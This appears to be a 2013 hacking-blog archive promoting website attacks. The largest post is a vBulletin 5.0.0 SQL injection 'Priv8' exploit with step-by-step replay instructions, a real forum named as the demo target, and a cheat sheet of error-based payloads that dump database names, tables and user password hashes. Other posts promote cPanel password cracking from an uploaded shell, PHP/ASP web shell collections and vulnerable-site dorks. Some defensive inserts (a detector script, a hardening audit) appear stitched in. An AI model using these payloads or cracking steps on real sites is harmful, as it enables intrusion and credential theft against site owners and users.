Showing posts with label Hacking. Show all posts

Monday, 16 December 2013

[ Top Attacks ] Website Hacking

0x:1) – Injection
0x:2) – Broken Authentication and Session Management
0x:3) – Cross-Site Scripting (XSS)
0x:4) – Insecure Direct Object References
0x:5) – Security Misconfiguration
0x:6) – Security Misconfiguration
0x:7) – Insecure Cryptographic Storage – Merged with 0x13
0x:8) – Sensitive Data Exposure
0x:9) – Failure to Restrict URL Access – Broadened into
0x:10) – Missing Function Level Access Control
0x:11) – Cross-Site Request Forgery (CSRF)
0x:12) - Security Misconfiguration
0x:13) – Using Known Vulnerable Components
0x:14) – Unvalidated Redirects and Forwards
0x:15) – Insufficient Transport Layer Protection


Thanks To #India Forum @ Edward Maya

Thursday, 1 August 2013

LFI-Via-phpinput Tutorial By H1N1


This is the LFI-Via-phpinput Tutorial book by Ko H1N1, our senior brother from MHU. It explains clearly, with pictures, how LFI is attacked using php://input. :D If you read it you will understand it better :D


Download : http://www.mediafire.com/download/md2w1k21pi1ssih/LFI-Via-phpinput_Tutorial_by_H1N1.pdf

Friday, 19 July 2013

UNION BASE INJECTION (Ebook)

This is my very first SQL Injection book. Chapter 1 covers only how to inject with Union Select .. .. :D


If the link dies, leave a comment. I will re-upload it to another site :D

Tuesday, 16 July 2013

vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day (Priv8)


This one was being sold on 1337 for $300 :)
http://www.priv8.1337day.com/exploit/description/20002
vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day
#Category: web application
#Type: SQL Injection
#Requirements: Firefox/Live HTTP Headers/
#Dork: Powered by vBulletin™ Version 5.0.0 Beta (or) Use ur Brain you'll get more o_O

Step 1
Create an Account on vBulletin forum Verify the account and Activate it
For Demo we will use this Forum
Link = http://www.prospectrush.com/new_forum/
I have already made an account so I will direct login

Step 2
go to/Open any topic and open Live HTTP Headers (https://addons.mozilla.org/en/firefox/addon/live-http-headers/) << download from here
and then on the Topic page search for "Like" button and Click on it ....
then the HTTP response would be caught on HTTP Headers addon
Step 3
Go to the first POST in HTTP Headers ,it will look like this
POST *Something /ajax/api/reputation/vote HTTP/1.1
select it and click on Replay button
Step 4
Then go on Send POST Content and use below Query ,
just add the Below Query after "noteid=somenumber"
=======================
SQL Query
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 1,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
=======================
The Above SQLi command will fetch out the first record from user table(username/password)
See the username and pass in encrypted form, get the salt too and decrypt it. I won't show decrypting, use your brain :)

=============
Greets to Real Author , All Indian & Pakistani Brothers , 1337day , ashiyane forums & All Indian Hacking Groups
//Note : Those Brothers who have my mail id can Contact me for other Deals
Offer Valid till 29th March 2013
Regards
./NoTty_rAJ
Thanks

[#Other SQLi Syntaxes]
*********************************************************************************************************************
|Version():
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************

*********************************************************************************************************************
|User():
*********************************************************************************************************************
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************

*********************************************************************************************************************
|Database():
*********************************************************************************************************************
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************

*********************************************************************************************************************
|Database Print:
*********************************************************************************************************************
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************
*********************************************************************************************************************
|Table Count:
*********************************************************************************************************************
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xHEXCODEOFDATABASE)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************
*********************************************************************************************************************
|Print Tables:
*********************************************************************************************************************
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEXCODEOFDATABASE LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************
*********************************************************************************************************************
|Columns of selected table:
*********************************************************************************************************************
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************
*********************************************************************************************************************
|Fetch Out Data:
*********************************************************************************************************************
*********************************************************************************************************************
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,column1,0x27,0x7e,column2,0x27,0x 7e) FROM ANY_TABLE LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*********************************************************************************************************************

Greetz to HeXagone  & Raw-X
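A defender's view of the request shape described in this post: a POST to `/ajax/api/reputation/vote` whose `noteid` value is no longer a plain integer and carries the traits of the error-based (duplicate-key) technique. This is an added example, not part of the original post or of vBulletin; the `/forum` path prefix and the sample request bodies are constructed.

```python
import re
from urllib.parse import parse_qsl, quote

VOTE_PATH = "/ajax/api/reputation/vote"  # endpoint named in the post
ID_PARAM = "noteid"                      # parameter the payload is appended to

# Traits of the duplicate-key ("double query") error-based technique.
SIGNATURES = {
    "floor(rand())": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "group by": re.compile(r"\bgroup\s+by\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
    "nested select": re.compile(r"\(\s*select\b", re.I),
}

def inspect_request(method, path, body):
    """Return findings for one HTTP request; an empty list means nothing to report."""
    if method.upper() != "POST" or not path.endswith(VOTE_PATH):
        return []
    findings = []
    for name, value in parse_qsl(body, keep_blank_values=True):  # URL-decodes values
        if name != ID_PARAM:
            continue
        # Allow-list check: the same rule the server should enforce before any query.
        if not re.fullmatch(r"[0-9]{1,18}", value):
            findings.append("noteid is not a plain integer")
        hits = [label for label, rx in SIGNATURES.items() if rx.search(value)]
        if len(hits) >= 2:
            findings.append("error-based SQLi traits: " + ", ".join(hits))
    return findings

def scan(requests):
    """Map request index -> findings for every request that has any."""
    report = {}
    for i, (method, path, body) in enumerate(requests):
        found = inspect_request(method, path, body)
        if found:
            report[i] = found
    return report

# Constructed sample traffic (not captured from any real site).
_TAIL = (") and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x "
         "from information_schema.tables group by x)a) AND (1338=1338")
SAMPLE_REQUESTS = [
    ("POST", "/forum/ajax/api/reputation/vote", "noteid=77"),
    ("POST", "/forum/ajax/api/reputation/vote", "noteid=77" + quote(_TAIL)),
    ("POST", "/forum/ajax/api/reputation/vote", "noteid=abc"),
    ("GET", "/forum/index.php", ""),
]

if __name__ == "__main__":
    for idx, found in scan(SAMPLE_REQUESTS).items():
        print(idx, found)
```

The integer allow-list is the part that belongs in the application itself, together with parameterized queries; the signature matching is only useful for log review and alerting.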

Monday, 15 July 2013

Cpanel Cracker (Php Script)


This is a cPanel cracking script. You crack through it from a shell. If you want to read the tutorial, go to http://lit2le.blogspot.com/2013/07/tut-cpanel-cracking.html.

[TUT] Cpanel Cracking

FOR EDUCATIONAL PURPOSE ONLY

What you need :-




Step By Step Tutorial :-

  • First open your shell & upload the cpanel password cracker shell . Download the Cpanel password cracker shell from Here 
  • Then go down & click on User .


  • Now after you have clicked on User, below you will get all the usernames of the Cpanel . So now move to next step, your next step will be to get a good Password list for a Dictionary attack . After getting it you have to copy the username & paste it in the username block (above) & paste the password list in the password block .Then finally click on start .

Tip: Password list should be short & effective . 

  • When the cracking is finished, you will see the result . 
  • Once you have the password, log in via www.site.com:2082 (or) www.site.com/cpanel. (www.site.com:2082 works better) :D 
Have Fun lady :)
Credit : h@ck2PlAy

PHP & ASP Shells [Collection]


The PHP shells and ASP shells I know of. This is so that the brothers doing web hacking have it easy.
(If a link dies, write it in the comments) :D Enjoy :D 
PHP Shells 

ASP Shells 

Monday, 8 July 2013

SQLMap Tutorial By H1N1

This is a small book written by Bro H1N1 from our M.H.U. It covers the basics of attacking with SQLmap. It should be especially handy for the brothers who are studying SQLMap.

[+] Download From Mediafire [+]



Tuesday, 25 June 2013

:.: BurpSuite :.:


What is Burp Suite?

Burp is a very good tool for website security. It is used mostly by security researchers and security pentesters. It includes many interfaces and a variety of tools, and it is an application written in Java, a programming language.

The included features are :.:

Proxy: Burp Proxy is an interactive HTTP/S proxy server for attacking and testing web applications. It operates as a man-in-the-middle between the end browser and the target web server, and allows the user to intercept, inspect and modify the raw traffic passing in both directions.

Spider: Burp Spider is a tool for mapping web applications. It uses various intelligent techniques to generate a comprehensive inventory of an application’s content and functionality.

Scanner: Burp Scanner is a tool for performing automated discovery of security vulnerabilities in web applications. It is designed to be used by penetration testers, and to fit in closely with your existing techniques and methodologies for performing manual and semi-automated penetration tests of web applications.

Intruder: Burp Intruder is a tool for automating customised attacks against web applications.

Repeater: Burp Repeater is a tool for manually modifying and reissuing individual HTTP requests, and analysing their responses. It is best used in conjunction with the other Burp Suite tools. For example, you can send a request to Repeater from the target site map, from the Burp Proxy browsing history, or from the results of a Burp Intruder attack, and manually adjust the request to fine-tune an attack or probe for vulnerabilities.

Sequencer: Burp Sequencer is a tool for analysing the degree of randomness in an application’s session tokens or other items on whose unpredictability the application depends for its security.

Decoder: Burp Decoder is a simple tool for transforming encoded data into its canonical form, or for transforming raw data into various encoded and hashed forms. It is capable of intelligently recognising several encoding formats using heuristic techniques.

Comparer: Burp Comparer is a simple tool for performing a comparison (a visual “diff”) between any two items of data. In the context of attacking a web application, this requirement will typically arise when you want to quickly identify the differences between two application responses (for example, between two responses received in the course of a Burp Intruder attack, or between responses to a failed login using valid and invalid usernames), or between two application requests (for example, to identify the different request parameters that give rise to different behaviour).


Source: http://www.portswigger.net/suite/ 


Burp Suite sits at position 13 among the Top 125 Network Security Tools and at number 1 among the 2013 top 15 hacking tools. Burp Suite is not a click-and-automatic tool like SQLmap, nor is it purely a web scanner .. .. Later, when you read Burp Suite tutorials, you will come to understand it and get a taste for it.

Friday, 14 June 2013

About : Jonathan James : (The story of a youth who hacked the Pentagon and NASA)

This is a young man named Jonathan James. He hacked computers at the Pentagon military headquarters and also hacked a NASA server so that it went down for 21 days. He was only 15 years old at the time. He lived in the state of Florida in the United States and, while still a high school student, came to people's attention for breaking his school's computer security systems. Starting in October 1999 he hacked a large number of computers at a research base of a Pentagon branch in the state of Virginia. His efforts damaged military computers, and as his next step he hacked NASA's satellite-control computer server. He used a backdoor to bypass all the security barriers. After that, the passwords of more than a hundred computers were lost, which caused difficulties in controlling the satellites and space stations outside the Earth. NASA took 3 weeks to find a solution, and the repairs cost US$41,000. That does not include the money lost during the 21 days the server was down. So the source IP was obtained, and commandos raided 15-year-old James in Florida. He spent 6 months in detention and was given house arrest lasting years. Jonathan James, who could have faced a 10-year prison sentence for this, was due to attend another court appointment in 2008. In the meantime he was under constant surveillance. He was not allowed to use a computer for any reason. Even so, during the surveillance period James did not give up his passion and kept pursuing hacking. He came to associate with well-known American hackers, and disputes arose in the hacker world. In this way he became troubled over hacking and came to suffer from depression, and on 18 May 2008 Jonathan James was found dead. He had shot himself in the head with a gun in the bathroom. He also left a note. The note he left mentions a hacking case in which he was accused. It was a case in which hackers had hacked a supermarket network. He left a note saying, among other things, that the claim that he was involved was not true and that he no longer had faith in justice. So, at just 15 years of age he was able to hack the Pentagon and NASA. Yet James, who took his own life, is known to have left behind a chilling episode in the world's hacker community. ..

Ref: wiki Aung Kham (TSJ team) Ref & Credit to TechSpace Journal

Thursday, 13 June 2013

Certified Ethical Hacker (CEH) STUDY GUIDE

I think this will be needed by students who are going to take CEH .. .. If you are interested, give it a read .. Either way, you gain some knowledge.

The book provides full coverage of exam topics & real-world examples.

You can expect:
Covers ethics and legal issues, footprinting, scanning, enumeration, system hacking, trojans and backdoors, sniffers, denial of service, social engineering, session hijacking, hacking Web servers, Web application vulnerabilities... and more

Full PDF:
http://noorasec.com/books/CEH2010V6.pdf

Tuesday, 4 June 2013

SQLmap On Window by liT2le [Ebook]

SQLmap On Window just means running sqlmap on Windows, hehe :P This is my very first ebook. :) Previously Ko H1N1 (a.k.a. U Tote Gyi) wrote about it on the MHU forum.. Here I demonstrate sqlmap with just the base commands.. I apologise if there are mistakes in my writing .. it is because this is my first one :D :)


Download :>: SQLmap On Window by lit2le


Sunday, 26 May 2013

Bypass Any blocked Website or port


When we visit some websites, they are blocked, either by our own connection or by the country. There are 2 methods for getting into those blocked sites .. Read on below.

Method 1: 

The first method is to go in through an online proxy.. 100 online proxies are given below.. You can go in through whichever link works for you ....
  1. http://www.unblocked-proxy.com
  2. http://www.unblockedproxy.net
  3. http://www.allunblocked.com
  4. http://www.unblockfor.me
  5. http://www.accessanywebsite.com/
  6. http://www.proxican.com
  7. http://www.websurfing.cn
  8. http://www.steelproxy.com
  9. http://bypass.it.cx
  10. http://www.agproxy.com
  11. http://unblockbypass.com
  12. http://www.covertbrowser.info
  13. http://bypass.secure.la
  14. http://www.wayaroundit.info/
  15. http://www.trixme.com

Vbulletin Forum Sql Injection [ Video Tutorial ]



Vulnerabilities Dork : inurl:"forums/group.php" Powered by vBulletin® Version 4.1.2


To crack VB hashes, use Password Pro ... (read here)

Video and data provided by MENTAL_MIND 

Credit And Regards : MENTAL_MIND

Protect the security of your website



==============================
1. Whenever updates are released for the type of script your site uses, upgrade the version.
2. Make your password combination as hard as you can.
3. Secure the admin login email.
4. Change the database prefixes ... for example ... if it starts with wp_ it is easy to guess the site is WordPress, and if it starts with jos_ it is easy to tell it is Joomla...
5. Put a password on the database.
6. If you use a CMS, do not forget to delete the install folder afterwards.
7. Because most plugins frequently produce errors, choose the plugins you use selectively.
8. Keep an eye on technology web blogs and stay as up to date as you can.

REF: net
Nothing is 100% secure!
[-- 4sectors --] 

Credit : 4sec
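A small audit for tips 4, 5 and 6 of the list above, run against a web root: it reports default `wp_` / `jos_` table prefixes, an empty database password, and a leftover installer folder. This is an added example, not part of the original post; it assumes the default WordPress (`wp-config.php`) and Joomla (`configuration.php`) config file and variable names, the installer folder names `install` and `installation`, and a constructed sample tree.

```python
import re
import tempfile
from pathlib import Path

DEFAULT_PREFIXES = {"wp_": "WordPress", "jos_": "Joomla"}  # prefixes named in tip 4
INSTALL_DIRS = {"install", "installation"}  # assumed installer folder names (tip 6)
CONFIG_FILES = {"wp-config.php", "configuration.php"}  # WordPress / Joomla config files

# WordPress: $table_prefix = 'wp_';   Joomla: public $dbprefix = 'jos_';
PREFIX_RX = re.compile(r"""\$(?:table_prefix|dbprefix)\s*=\s*['"]([^'"]*)['"]""")
# WordPress: define('DB_PASSWORD', '...');   Joomla: public $password = '...';
PASSWORD_RX = re.compile(
    r"""(?:define\(\s*['"]DB_PASSWORD['"]\s*,|\$password\s*=)\s*['"]([^'"]*)['"]""")

def audit_webroot(root):
    """Return human-readable findings for tips 4, 5 and 6 under a web root."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        rel = path.relative_to(root).as_posix()
        if path.is_dir() and path.name.lower() in INSTALL_DIRS:
            findings.append(f"{rel}/: installer folder still present")
        elif path.is_file() and path.name in CONFIG_FILES:
            text = path.read_text(errors="replace")
            prefix = PREFIX_RX.search(text)
            if prefix and prefix.group(1) in DEFAULT_PREFIXES:
                cms = DEFAULT_PREFIXES[prefix.group(1)]
                findings.append(f"{rel}: default prefix {prefix.group(1)} reveals {cms}")
            password = PASSWORD_RX.search(text)
            if password and password.group(1) == "":
                findings.append(f"{rel}: database password is empty")
    return findings

def demo():
    """Build a constructed sample web root in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "blog").mkdir()
        (root / "blog" / "wp-config.php").write_text(
            "<?php\ndefine( 'DB_PASSWORD', 'constructed-Pa55' );\n$table_prefix = 'wp_';\n")
        (root / "shop" / "installation").mkdir(parents=True)
        (root / "shop" / "configuration.php").write_text(
            "<?php\nclass JConfig {\n  public $password = '';\n  public $dbprefix = 'k3x_';\n}\n")
        return audit_webroot(root)

if __name__ == "__main__":
    for line in demo():
        print(line)
```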

Wednesday, 15 May 2013

How secure is DNN?


Go and read about DNN hacking here ... For the most part, very few Myanmar sites are affected by DNN hacking; there are almost none. Still, there are some Myanmar sites that are vulnerable to DNN.. So I will explain how to defend against it. . . First of all, rename Fcklinkgallery.aspx. The FCKGallery comes up via the substituted link, so once you rename it, it will no longer come up; an average hacker will give up as soon as they do not know your FCK name. Without the FCKgallery nothing can be uploaded any more, so there is no way to upload a shell. The rename can be made at
<dotnetnuke><htmlEditor><providers><add name="FckHtmlEditorProvider">

Tuesday, 23 April 2013

NetworkHackingTesting (BT)


Although it is titled Network Hacking, whether you want to control another CPU in an internet cafe ... or control other computers (including servers) on your own Wi-Fi network, the hack is demonstrated using Armitage .. .. The test is demonstrated based on Armitage, one of the hacking tools built into Back Track .. The author is bro 3thic0kiddi3. The hack is demonstrated on Back Track .. ..

Sunday, 21 April 2013

Mozilla Add-ons ~! ( F0r Hacking And IT Security )

To set all here Mozilla Add-ons > Add-ons .
I have collected (35) add-ons that I think may be useful. :) F0r Hacking And IT Security ! :)

  1. FREE EBOOK SEARCH : to find the e-book.
  2. SPY SERVER : see the type of server.
  3. DOMAIN FINDER : search for a domain.
  4. WHO IS : see details of the site.
  5. ABOUT THIS SITE : see website details
  6. TIX NOW : turn off timer rapidshare.
  7. Firebug : edit html, css, javascript in virtual hacking.
  8. XSS-Me : xss trial to the target site.
  9. SQL Inject Me : SQL Injection experiments to the target site.
  10. Unhide Passwords : see our current password sniffing on the LAN itself.

Python



Let me introduce you to Python, one area of coding .. .. Go to this group
>> www.facebook.com/groups/361983457247340 << It will be handy for those studying the coding language called Python. It will be handy for beginners like us . . .

What is Python ,
How To Use ,
Ebook ,
Tool ,
Tutorial and
the basics can all be studied there . . .  :) From now on I will also keep discussing what I know of Python in this group .. .. Welc0me all :)

#Have Fun :)

Wednesday, 17 April 2013

Top 15 Security/Hacking Tools Utilities





There are 15 tools. Each is used in its own way .. I have written up info for some of the tools.. The download links are from the original sites, so the links work fine .. .. .. :)

1). Nmap (you can read the Nmap tutorial at Ghostarea)
 #:.Download.:#
http://nmap.org/download.html

2). Nessus Remote Security Scanner
Nessus is a well-known vulnerability scanner.
#:.Download.:#
http://www.nessus.org/download/